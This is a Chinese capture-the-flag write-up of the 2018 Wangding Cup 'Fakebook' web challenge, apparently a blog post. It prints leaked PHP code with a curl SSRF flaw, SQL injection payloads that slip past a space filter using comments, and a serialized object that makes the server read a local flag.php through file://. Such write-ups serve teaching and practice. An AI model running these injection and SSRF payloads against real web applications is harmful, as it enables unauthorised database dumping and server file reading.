[网鼎杯 2018]Fakebook

访问robots.txt发现可疑信息。

 

 下载下来,

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

在get()函数存在SSRF(服务端请求伪造)漏洞。

当我点击刚注册的名字的时候

 

 猜测存在sql注入。

?no=1 order by 5#  //报错,存在4列
?no=1 union select 1,2,3,4#  //提示no hack ~_~

存在waf,过滤了空格,用注释绕过

?no=-1/**/union/**/select/**/1,2,3,4#

 

 反序列吧

爆数据库先

 

 爆表

 

 爆字段

data里面存在反序列字符

?no=-1/**/union/**/select/**/1,(select/**/group_concat(data)/**/from/**/users),3,4#

 

O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:123;s:4:"blog";s:7:"123.com";}

暴露信息: /var/www/html/

 反序列化,需要他泄露的源码

 

 

O:8:"UserInfo":3:{s:4:"name";s:0:"";s:3:"age";i:0;s:4:"blog";s:28:"file://var/www/html/flag.php";}
?no=-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

 源码中

 

 base64解码,flag出。

 

posted @ 2021-03-25 17:40  夜布多  阅读(68)  评论(0编辑  收藏  举报